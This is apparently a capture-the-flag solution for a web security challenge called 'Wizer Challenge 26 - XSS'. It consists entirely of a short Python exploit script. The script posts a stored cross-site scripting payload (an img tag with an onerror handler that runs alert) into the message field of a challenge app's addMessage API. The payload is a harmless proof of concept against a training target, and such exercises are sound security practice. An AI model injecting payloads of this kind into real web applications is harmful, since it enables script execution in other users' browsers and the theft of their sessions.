Wizer - Challenge 26 - XSS

Exploit

import requests

url = "https://chal26-j89j45fg8.vercel.app"

r = requests.post(
    url + "/api/addMessage",
    json=[
        {"name": "firstName", "value": "pelele"},
        {"name": "lastName", "value": "pelele"},
        {"name": "message", "value": "<img src=x onerror=alert('Wizer')>"},
    ],
)


print(r.text)